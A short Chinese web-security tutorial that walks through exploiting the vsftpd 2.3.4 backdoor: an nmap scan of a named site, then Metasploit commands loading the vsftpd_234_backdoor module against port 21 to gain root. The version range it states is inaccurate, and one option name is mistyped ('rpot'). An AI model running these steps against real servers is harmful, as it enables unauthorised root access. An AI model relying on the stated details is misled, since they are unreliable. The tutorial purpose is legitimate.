vsftpd version 2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。、
首先,先用nmap进行详细的扫描,命令如下
nmap -sT -A www.0-sec.org -sT
msf远程溢出(21端口)vsftpd漏洞-Web安全
namp还是比较强大的,会罗列出来 所有端口的详细信息 。 当然我们网站是没有开启21端口的,只是举个例子。
输入msfconsole打开msf
搜索vsftpd漏洞模块
msf > search vsftpd
已经发现了一个模块,直接调用这个模块
msf >use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) >set rhost 127.0.0.1
msf exploit(vsftpd_234_backdoor) >set rpot 21
msf exploit(vsftpd_234_backdoor) >exploit